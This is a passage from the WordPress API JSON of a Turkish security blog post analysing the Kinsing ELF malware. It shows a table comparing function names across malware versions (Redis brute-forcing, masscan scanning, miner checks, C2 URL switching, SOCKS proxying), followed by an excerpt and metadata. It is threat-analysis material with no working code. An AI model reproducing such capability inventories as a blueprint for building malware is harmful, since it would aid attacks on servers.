>\n<td>getOrCreateUuid<\/td>\n<\/tr>\n<tr>\n<td>getTargets<\/td>\n<td>getTargets<\/td>\n<\/tr>\n<tr>\n<td>getTask<\/td>\n<td>getTask<\/td>\n<\/tr>\n<tr>\n<td>getWriteableDir<\/td>\n<td>getWriteableDir<\/td>\n<\/tr>\n<tr>\n<td>go<\/td>\n<td>go<\/td>\n<\/tr>\n<tr>\n<td>hash_file_md5<\/td>\n<td>hash_file_md5<\/td>\n<\/tr>\n<tr>\n<td>healthChecker<\/td>\n<td>healthChecker<\/td>\n<\/tr>\n<tr>\n<td>inc<\/td>\n<td>inc<\/td>\n<\/tr>\n<tr>\n<td>init<\/td>\n<td>init<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>isMinerRunning<\/td>\n<\/tr>\n<tr>\n<td>main<\/td>\n<td>main<\/td>\n<\/tr>\n<tr>\n<td>makeClient<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>masscan<\/td>\n<td>masscan<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>minRun<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>minerRunningCheck<\/td>\n<\/tr>\n<tr>\n<td>move<\/td>\n<td>move<\/td>\n<\/tr>\n<tr>\n<td>randIntRange<\/td>\n<td>randIntRange<\/td>\n<\/tr>\n<tr>\n<td>redisBrute<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>request<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>resultSender<\/td>\n<td>resultSender<\/td>\n<\/tr>\n<tr>\n<td>runTask<\/td>\n<td>runTask<\/td>\n<\/tr>\n<tr>\n<td>runTaskWithHttp<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>runTaskWithScan<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>runcmd<\/td>\n<td>runcmd<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>sendMinerPid<\/td>\n<\/tr>\n<tr>\n<td>sendResult<\/td>\n<td>sendResult<\/td>\n<\/tr>\n<tr>\n<td>sendSocks<\/td>\n<td>sendSocks<\/td>\n<\/tr>\n<tr>\n<td>setActiveC2CUrl<\/td>\n<td>setActiveC2CUrl<\/td>\n<\/tr>\n<tr>\n<td>setExecOutput<\/td>\n<td>setExecOutput<\/td>\n<\/tr>\n<tr>\n<td>setLog<\/td>\n<td>setLog<\/td>\n<\/tr>\n<tr>\n<td>setUuid<\/td>\n<td>setUuid<\/td>\n<\/tr>\n<tr>\n<td>socks<\/td>\n<td>socks<\/td>\n<\/tr>\n<tr>\n<td>startCmd<\/td>\n<td>startCmd<\/td>\n<\/tr>\n<tr>\n<td><\/td>\n<td>startCmdWithOutputSingle<\/td>\n<\/tr>\n<tr>\n<td>startSocks<\/td>\n<td>startSocks<\/td>\n<\/tr>\n<tr>\n<td>syncCmd<\/td>\n<td>syncCmd<\/td>\n<\/tr>\n<tr>\n<td>taskScan<\/td>\n<td>taskScan<\/td>\n<\/tr>\n<tr>\n<td>taskWithHttpWorker<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>taskWithScanWorker<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>taskWorker<\/td>\n<td>taskWorker<\/td>\n<\/tr>\n<tr>\n<td>tcpTask<\/td>\n<td><\/td>\n<\/tr>\n<tr>\n<td>updateTask<\/td>\n<td>updateTask<\/td>\n<\/tr>\n<tr>\n<td>writable<\/td>\n<td>writable<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>Kinsing Nedir? Son zamanlarda, bulut ve konteyner tehditlerinin geli\u015fen alan\u0131n\u0131 ara\u015ft\u0131rmakla me\u015fgul\u00fcz. Neden buraya odaklanal\u0131m? \u00c7\u00fcnk\u00fc, bu teknoloji daha pop\u00fcler hale geldik\u00e7e ve geli\u015fmeye devam ettik\u00e7e, sald\u0131rganlar da bu sistemlere s\u0131zmak i\u00e7in tekniklerini geli\u015ftiriyorlar. Ara\u015ft\u0131rmam\u0131z s\u0131ras\u0131nda, Redis\u00a0ve\u00a0SaltStack\u00a0dahil olmak \u00fczere birden fazla sald\u0131r\u0131 kampanyas\u0131nda yer alan bir ELF k\u00f6t\u00fc ama\u00e7l\u0131 yaz\u0131l\u0131m\u0131 olan\u00a0Kinsing ile\u00a0kar\u015f\u0131la\u015ft\u0131k\u00a0. Kinsing, son birka\u00e7 &hellip;<\/p>\n","protected":false},"author":1,"featured_media":8770,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[232],"tags":[],"class_list":["post-8761","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"acf":[],"_links":{"self":[{"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/posts\/8761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/comments?post=8761"}],"version-history":[{"count":0,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/posts\/8761\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/media\/8770"}],"wp:attachment":[{"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/media?parent=8761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/categories?post=8761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sunucucozumleri.com\/blog\/wp-json\/wp\/v2\/tags?post=8761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}